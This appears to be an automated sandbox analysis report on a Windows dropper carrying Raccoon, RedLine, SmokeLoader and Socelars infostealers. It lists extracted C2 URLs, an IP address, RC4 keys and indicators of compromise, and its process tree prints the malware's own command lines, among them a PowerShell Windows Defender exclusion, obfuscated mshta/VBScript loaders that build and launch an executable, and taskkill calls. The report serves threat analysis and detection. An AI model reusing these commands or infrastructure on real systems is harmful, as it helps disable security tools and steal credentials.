raccoon | 400debff42246bcf28d1eba937480ebdfa755c932707db10ab58ec4a1f5e94f1

Resubmissions

10/11/2021, 14:52 UTC

211110-r84p8aedej 10

09/11/2021, 13:19 UTC

211109-qkrv3sfcg4 10

Analysis

max time kernel
50s
max time network
170s
platform
windows7_x64
resource
win7-en-20211014
submitted
09/11/2021, 13:19 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe
Size

4.6MB
MD5

664aed619fcf50da08dc9d74f48aad57
SHA1

995df8d6655cf256187df9bc9699bdd094c33616
SHA256

243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493
SHA512

c2b5326396712ef94b51ab52e5f655134978af980db04c09c3cb7a6fce5e236087da790a65b493c1e9760617a2867070ad824a2d458f38a65916594d313254fc

Score

10^/10

raccoon redline smokeloader socelars 2f2ad1a1aa093c5a9d17040c8efd5650a99640b5 media18 aspackv2 backdoor evasion infostealer spyware stealer trojan

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.efxety.top/

Extracted

Family

raccoon

Botnet

2f2ad1a1aa093c5a9d17040c8efd5650a99640b5

Attributes

url4cnc
http://telegatt.top/oh12manymarty

http://telegka.top/oh12manymarty

http://telegin.top/oh12manymarty

https://t.me/oh12manymarty

rc4.plain

1
iV8+pT5$yP7{

rc4.plain

1
e2cfffb29d056b0138f041f850361ced

Extracted

Family

smokeloader

Version

2020

http://directorycart.com/upload/

http://tierzahnarzt.at/upload/

http://streetofcards.com/upload/

http://ycdfzd.com/upload/

http://successcoachceo.com/upload/

http://uhvu.cn/upload/

http://japanarticle.com/upload/

rc4.i32

1
0x3b22e540

rc4.i32

1
0xa6b397e0

Extracted

Family

redline

Botnet

media18

91.121.67.60:2151

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 4 IoCs

resource	yara_rule
behavioral19/memory/2704-252-0x000000000041B23E-mapping.dmp	family_redline
behavioral19/memory/2704-250-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral19/memory/2704-249-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral19/memory/2704-247-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 1 IoCs

resource	yara_rule
behavioral19/files/0x00050000000132e0-162.dat	family_socelars

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral19/files/0x00070000000121fc-65.dat	aspack_v212_v242
behavioral19/files/0x00070000000121fc-66.dat	aspack_v212_v242
behavioral19/files/0x00070000000121fe-64.dat	aspack_v212_v242
behavioral19/files/0x00070000000121fe-63.dat	aspack_v212_v242
behavioral19/files/0x0005000000013109-70.dat	aspack_v212_v242
behavioral19/files/0x0005000000013109-69.dat	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 18 IoCs

pid	Process
368	setup_install.exe
1284	Tue16703646a5ae7.exe
1768	Tue16cea79fd58a17a.exe
1704	Tue165ca48696e212.exe
1544	Tue16af5513dabbf.exe
1932	Tue16d47340279.exe
268	Tue16c335f877.exe
1576	Tue1628cd68fb2319b0.exe
1036	Tue16b77353ecd495ba.exe
1056	Tue16a1e0194b6e612.exe
1636	Tue168e957580fbc2.exe
1260	Tue16b2877f8bd.exe
972	Tue16cea79fd58a17a.exe
1828	Tue166ff30c98d.exe
892	Tue165edc47615.exe
820	Tue1628cd68fb2319b0.tmp
1804	Tue1628cd68fb2319b0.exe
804	Tue1628cd68fb2319b0.tmp

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Control Panel\International\Geo\Nation	Tue16c335f877.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Control Panel\International\Geo\Nation	Tue16703646a5ae7.exe

Loads dropped DLL 64 IoCs

pid	Process
660	243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe
660	243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe
660	243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe
368	setup_install.exe
368	setup_install.exe
368	setup_install.exe
368	setup_install.exe
368	setup_install.exe
368	setup_install.exe
368	setup_install.exe
368	setup_install.exe
1928	cmd.exe
1472	cmd.exe
684	cmd.exe
684	cmd.exe
1284	Tue16703646a5ae7.exe
1284	Tue16703646a5ae7.exe
1016	cmd.exe
1720	cmd.exe
1908	cmd.exe
1896	cmd.exe
1896	cmd.exe
1092	cmd.exe
1092	cmd.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
1576	Tue1628cd68fb2319b0.exe
1576	Tue1628cd68fb2319b0.exe
1960	cmd.exe
1636	Tue168e957580fbc2.exe
1636	Tue168e957580fbc2.exe
1036	Tue16b77353ecd495ba.exe
1036	Tue16b77353ecd495ba.exe
1544	Tue16af5513dabbf.exe
1544	Tue16af5513dabbf.exe
596	cmd.exe
568	cmd.exe
568	cmd.exe
848	cmd.exe
848	cmd.exe
1260	Tue16b2877f8bd.exe
1260	Tue16b2877f8bd.exe
892	Tue165edc47615.exe
892	Tue165edc47615.exe
1828	Tue166ff30c98d.exe
1828	Tue166ff30c98d.exe
1056	Tue16a1e0194b6e612.exe
1056	Tue16a1e0194b6e612.exe
1704	Tue165ca48696e212.exe
1704	Tue165ca48696e212.exe
1576	Tue1628cd68fb2319b0.exe
820	Tue1628cd68fb2319b0.tmp
820	Tue1628cd68fb2319b0.tmp
820	Tue1628cd68fb2319b0.tmp
820	Tue1628cd68fb2319b0.tmp
1804	Tue1628cd68fb2319b0.exe
1804	Tue1628cd68fb2319b0.exe
1984	WerFault.exe
1984	WerFault.exe
1984	WerFault.exe
1804	Tue1628cd68fb2319b0.exe
804	Tue1628cd68fb2319b0.tmp
804	Tue1628cd68fb2319b0.tmp
804	Tue1628cd68fb2319b0.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
43	ipinfo.io
44	ipinfo.io
45	ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
1984	368	WerFault.exe	28
2768	1284	WerFault.exe	33
2864	268	WerFault.exe	53
2516	1260	WerFault.exe	46

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Tue166ff30c98d.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Tue166ff30c98d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Tue166ff30c98d.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
2424	taskkill.exe
2220	taskkill.exe
1828	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	Tue16b2877f8bd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	Tue16b2877f8bd.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1828	Tue166ff30c98d.exe
1828	Tue166ff30c98d.exe
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
268	Tue16c335f877.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
1272	Process not Found
268	Tue16c335f877.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
1284	Tue16703646a5ae7.exe
1284	Tue16703646a5ae7.exe
1284	Tue16703646a5ae7.exe
1284	Tue16703646a5ae7.exe
1284	Tue16703646a5ae7.exe
268	Tue16c335f877.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1828	Tue166ff30c98d.exe

Suspicious use of AdjustPrivilegeToken 36 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	1260	Tue16b2877f8bd.exe
Token: SeAssignPrimaryTokenPrivilege	1260	Tue16b2877f8bd.exe
Token: SeLockMemoryPrivilege	1260	Tue16b2877f8bd.exe
Token: SeIncreaseQuotaPrivilege	1260	Tue16b2877f8bd.exe
Token: SeMachineAccountPrivilege	1260	Tue16b2877f8bd.exe
Token: SeTcbPrivilege	1260	Tue16b2877f8bd.exe
Token: SeSecurityPrivilege	1260	Tue16b2877f8bd.exe
Token: SeTakeOwnershipPrivilege	1260	Tue16b2877f8bd.exe
Token: SeLoadDriverPrivilege	1260	Tue16b2877f8bd.exe
Token: SeSystemProfilePrivilege	1260	Tue16b2877f8bd.exe
Token: SeSystemtimePrivilege	1260	Tue16b2877f8bd.exe
Token: SeProfSingleProcessPrivilege	1260	Tue16b2877f8bd.exe
Token: SeIncBasePriorityPrivilege	1260	Tue16b2877f8bd.exe
Token: SeCreatePagefilePrivilege	1260	Tue16b2877f8bd.exe
Token: SeCreatePermanentPrivilege	1260	Tue16b2877f8bd.exe
Token: SeBackupPrivilege	1260	Tue16b2877f8bd.exe
Token: SeRestorePrivilege	1260	Tue16b2877f8bd.exe
Token: SeShutdownPrivilege	1260	Tue16b2877f8bd.exe
Token: SeDebugPrivilege	1260	Tue16b2877f8bd.exe
Token: SeAuditPrivilege	1260	Tue16b2877f8bd.exe
Token: SeSystemEnvironmentPrivilege	1260	Tue16b2877f8bd.exe
Token: SeChangeNotifyPrivilege	1260	Tue16b2877f8bd.exe
Token: SeRemoteShutdownPrivilege	1260	Tue16b2877f8bd.exe
Token: SeUndockPrivilege	1260	Tue16b2877f8bd.exe
Token: SeSyncAgentPrivilege	1260	Tue16b2877f8bd.exe
Token: SeEnableDelegationPrivilege	1260	Tue16b2877f8bd.exe
Token: SeManageVolumePrivilege	1260	Tue16b2877f8bd.exe
Token: SeImpersonatePrivilege	1260	Tue16b2877f8bd.exe
Token: SeCreateGlobalPrivilege	1260	Tue16b2877f8bd.exe
Token: 31	1260	Tue16b2877f8bd.exe
Token: 32	1260	Tue16b2877f8bd.exe
Token: 33	1260	Tue16b2877f8bd.exe
Token: 34	1260	Tue16b2877f8bd.exe
Token: 35	1260	Tue16b2877f8bd.exe
Token: SeDebugPrivilege	2424	taskkill.exe
Token: SeShutdownPrivilege	1272	Process not Found

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
1272	Process not Found
1272	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 660 wrote to memory of 368	660	243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe	28
PID 660 wrote to memory of 368	660	243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe	28
PID 660 wrote to memory of 368	660	243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe	28
PID 660 wrote to memory of 368	660	243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe	28
PID 660 wrote to memory of 368	660	243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe	28
PID 660 wrote to memory of 368	660	243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe	28
PID 660 wrote to memory of 368	660	243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe	28
PID 368 wrote to memory of 1104	368	setup_install.exe	30
PID 368 wrote to memory of 1104	368	setup_install.exe	30
PID 368 wrote to memory of 1104	368	setup_install.exe	30
PID 368 wrote to memory of 1104	368	setup_install.exe	30
PID 368 wrote to memory of 1104	368	setup_install.exe	30
PID 368 wrote to memory of 1104	368	setup_install.exe	30
PID 368 wrote to memory of 1104	368	setup_install.exe	30
PID 368 wrote to memory of 1472	368	setup_install.exe	31
PID 368 wrote to memory of 1472	368	setup_install.exe	31
PID 368 wrote to memory of 1472	368	setup_install.exe	31
PID 368 wrote to memory of 1472	368	setup_install.exe	31
PID 368 wrote to memory of 1472	368	setup_install.exe	31
PID 368 wrote to memory of 1472	368	setup_install.exe	31
PID 368 wrote to memory of 1472	368	setup_install.exe	31
PID 368 wrote to memory of 1928	368	setup_install.exe	32
PID 368 wrote to memory of 1928	368	setup_install.exe	32
PID 368 wrote to memory of 1928	368	setup_install.exe	32
PID 368 wrote to memory of 1928	368	setup_install.exe	32
PID 368 wrote to memory of 1928	368	setup_install.exe	32
PID 368 wrote to memory of 1928	368	setup_install.exe	32
PID 368 wrote to memory of 1928	368	setup_install.exe	32
PID 368 wrote to memory of 1756	368	setup_install.exe	35
PID 368 wrote to memory of 1756	368	setup_install.exe	35
PID 368 wrote to memory of 1756	368	setup_install.exe	35
PID 368 wrote to memory of 1756	368	setup_install.exe	35
PID 368 wrote to memory of 1756	368	setup_install.exe	35
PID 368 wrote to memory of 1756	368	setup_install.exe	35
PID 368 wrote to memory of 1756	368	setup_install.exe	35
PID 368 wrote to memory of 684	368	setup_install.exe	37
PID 368 wrote to memory of 684	368	setup_install.exe	37
PID 368 wrote to memory of 684	368	setup_install.exe	37
PID 368 wrote to memory of 684	368	setup_install.exe	37
PID 368 wrote to memory of 684	368	setup_install.exe	37
PID 368 wrote to memory of 684	368	setup_install.exe	37
PID 368 wrote to memory of 684	368	setup_install.exe	37
PID 368 wrote to memory of 1016	368	setup_install.exe	59
PID 368 wrote to memory of 1016	368	setup_install.exe	59
PID 368 wrote to memory of 1016	368	setup_install.exe	59
PID 368 wrote to memory of 1016	368	setup_install.exe	59
PID 368 wrote to memory of 1016	368	setup_install.exe	59
PID 368 wrote to memory of 1016	368	setup_install.exe	59
PID 368 wrote to memory of 1016	368	setup_install.exe	59
PID 1928 wrote to memory of 1284	1928	cmd.exe	33
PID 1928 wrote to memory of 1284	1928	cmd.exe	33
PID 1928 wrote to memory of 1284	1928	cmd.exe	33
PID 1928 wrote to memory of 1284	1928	cmd.exe	33
PID 1928 wrote to memory of 1284	1928	cmd.exe	33
PID 1928 wrote to memory of 1284	1928	cmd.exe	33
PID 1928 wrote to memory of 1284	1928	cmd.exe	33
PID 1104 wrote to memory of 1816	1104	cmd.exe	34
PID 1104 wrote to memory of 1816	1104	cmd.exe	34
PID 1104 wrote to memory of 1816	1104	cmd.exe	34
PID 1104 wrote to memory of 1816	1104	cmd.exe	34
PID 1104 wrote to memory of 1816	1104	cmd.exe	34
PID 1104 wrote to memory of 1816	1104	cmd.exe	34
PID 1104 wrote to memory of 1816	1104	cmd.exe	34
PID 368 wrote to memory of 1720	368	setup_install.exe	38

C:\Users\Admin\AppData\Local\Temp\243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe
"C:\Users\Admin\AppData\Local\Temp\243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:660
- C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\setup_install.exe
  "C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\setup_install.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:368
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1104
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      PID:1816
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue16af5513dabbf.exe
    3⤵
    - Loads dropped DLL
    PID:1472
  - - C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16af5513dabbf.exe
      Tue16af5513dabbf.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1544
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBScrIPt: ClOse ( CrEATeobjEct ( "wScRipt.SHELl").run ( "CMd /C tYpe ""C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16af5513dabbf.exe""> fkKCS.exe&& StarT fkKCS.EXE -P_3FA3g8_0NB & If """" == """" for %E In ( ""C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16af5513dabbf.exe"" ) do taskkill -F /iM ""%~nXE"" ", 0, True ) )
        5⤵
        
        PID:2204
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C tYpe "C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16af5513dabbf.exe"> fkKCS.exe&& StarT fkKCS.EXE -P_3FA3g8_0NB & If "" =="" for %E In ( "C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16af5513dabbf.exe" ) do taskkill -F /iM "%~nXE"
        6⤵
        
        PID:2996
        
        C:\Users\Admin\AppData\Local\Temp\fkKCS.exe
        
        fkKCS.EXE -P_3FA3g8_0NB
        7⤵
        
        PID:2256
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBScrIPt: ClOse ( CrEATeobjEct ( "wScRipt.SHELl").run ( "CMd /C tYpe ""C:\Users\Admin\AppData\Local\Temp\fkKCS.exe""> fkKCS.exe&& StarT fkKCS.EXE -P_3FA3g8_0NB & If ""-P_3FA3g8_0NB "" == """" for %E In ( ""C:\Users\Admin\AppData\Local\Temp\fkKCS.exe"" ) do taskkill -F /iM ""%~nXE"" ", 0, True ) )
        8⤵
        
        PID:2136
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C tYpe "C:\Users\Admin\AppData\Local\Temp\fkKCS.exe"> fkKCS.exe&& StarT fkKCS.EXE -P_3FA3g8_0NB & If "-P_3FA3g8_0NB " =="" for %E In ( "C:\Users\Admin\AppData\Local\Temp\fkKCS.exe" ) do taskkill -F /iM "%~nXE"
        9⤵
        
        PID:2436
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBscRipt: ClOSE( cREaTEOBjEcT ("wSCript.sheLl").RUN ( "Cmd.eXE /c echo N%TIme%O>VPZp.II & EChO | set /p = ""MZ"" > KL6F.Aa_ &cOpY /y /B kL6F.AA_+LAQIL0YY.POg + vCTGFFAM.2ST + ip~Q0M_L.i + IfY08H17.9LD + 1cQMG.2 + VpZp.II PUA9.FS & sTaRT msiexec.exe /Y .\pUA9.FS " ,0 , TRUe ) )
        8⤵
        
        PID:2340
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c echo N%TIme%O>VPZp.II & EChO | set /p = "MZ" > KL6F.Aa_ &cOpY /y /B kL6F.AA_+LAQIL0YY.POg + vCTGFFAM.2ST+ ip~Q0M_L.i + IfY08H17.9LD + 1cQMG.2 + VpZp.II PUA9.FS & sTaRT msiexec.exe /Y .\pUA9.FS
        9⤵
        
        PID:2492
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" EChO "
        10⤵
        
        PID:1572
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>KL6F.Aa_"
        10⤵
        
        PID:2176
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -F /iM "Tue16af5513dabbf.exe"
        7⤵
        Kills process with taskkill
        
        PID:1828
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue16703646a5ae7.exe
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1928
  - - C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16703646a5ae7.exe
      Tue16703646a5ae7.exe
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      PID:1284
    - - C:\Users\Admin\Pictures\Adobe Films\M857AmZVkXYV8nP_3845VgLm.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\M857AmZVkXYV8nP_3845VgLm.exe"
        5⤵
        
        PID:2668
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 1508
        5⤵
        Program crash
        
        PID:2768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue16cea79fd58a17a.exe
    3⤵
    PID:1756
  - - C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16cea79fd58a17a.exe
      "C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16cea79fd58a17a.exe"
      4⤵
      Executes dropped EXE
      PID:972
  - - C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16cea79fd58a17a.exe
      Tue16cea79fd58a17a.exe
      4⤵
      Executes dropped EXE
      PID:1768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue165ca48696e212.exe /mixone
    3⤵
    - Loads dropped DLL
    PID:684
  - - C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue165ca48696e212.exe
      Tue165ca48696e212.exe /mixone
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1704
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "Tue165ca48696e212.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue165ca48696e212.exe" & exit
        5⤵
        
        PID:2316
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "Tue165ca48696e212.exe" /f
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue16c335f877.exe
    3⤵
    - Loads dropped DLL
    PID:1720
  - - C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16c335f877.exe
      Tue16c335f877.exe
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      PID:268
    - - C:\Users\Admin\Pictures\Adobe Films\M857AmZVkXYV8nP_3845VgLm.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\M857AmZVkXYV8nP_3845VgLm.exe"
        5⤵
        
        PID:2656
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 268 -s 1460
        5⤵
        Program crash
        
        PID:2864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue16a1e0194b6e612.exe
    3⤵
    - Loads dropped DLL
    PID:1092
  - - C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16a1e0194b6e612.exe
      Tue16a1e0194b6e612.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1056
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue16b77353ecd495ba.exe
    3⤵
    - Loads dropped DLL
    PID:1896
  - - C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16b77353ecd495ba.exe
      Tue16b77353ecd495ba.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1036
    - - C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16b77353ecd495ba.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16b77353ecd495ba.exe
        5⤵
        
        PID:2704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue16b2877f8bd.exe
    3⤵
    - Loads dropped DLL
    PID:596
  - - C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16b2877f8bd.exe
      Tue16b2877f8bd.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Modifies system certificate store
      Suspicious use of AdjustPrivilegeToken
      PID:1260
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        
        PID:3024
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        
        PID:2220
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1260 -s 588
        5⤵
        Program crash
        
        PID:2516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue165edc47615.exe
    3⤵
    - Loads dropped DLL
    PID:848
  - - C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue165edc47615.exe
      Tue165edc47615.exe
